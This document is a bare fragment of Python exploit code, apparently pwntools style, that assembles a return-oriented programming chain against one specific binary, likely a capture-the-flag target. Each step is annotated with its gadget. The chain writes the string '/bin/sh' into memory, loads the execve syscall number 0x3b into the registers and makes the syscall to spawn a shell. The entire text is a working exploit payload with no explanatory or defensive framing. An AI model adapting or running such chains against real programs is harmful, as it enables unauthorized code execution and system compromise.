payload = p64(0x4065a9)
#0x00000000004065a9: pop r12; ret; 
payload += p64(0x68662f6e69622f)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x419050)+p64(0x4065ed)
# 0x00000000004065ed: xchg eax, ebp; ret; 
payload += p64(0x4066e0)
# 0x00000000004066e0: mov qword ptr [rax + 0x20], r12; add rsp, 8; pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x407061)
# 0x0000000000407061: pop rbx; ret; 
payload += p64(0x419070)+p64(0x4080bc)
# 0x00000000004080bc: pop rsi; ret; 
payload += p64(0x40121f)+p64(0x415cf5)
# 0x0000000000415cf5: xchg ebx, edi; stc; push rsi; mov ebx, 0x234edf80; ret; 
payload += b''
# 0x000000000040121f: mov eax, 0; test rax, rax; je 0x1230; mov edi, 0x419080; jmp rax; 
payload += p64(0x40620d)
# 0x000000000040620d: mov edx, eax; shr rdx, 0x3f; add rax, rdx; sar rax, 1; jne 0x621d; pop rbp; ret; 
payload += p64(0x0)+p64(0x4080bc)
# 0x00000000004080bc: pop rsi; ret; 
payload += p64(0x0)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x3b)+p64(0x4065ed)
# 0x00000000004065ed: xchg eax, ebp; ret; 
payload += p64(0x40dd83)
# 0x000000000040dd83: syscall; 
payload += b''
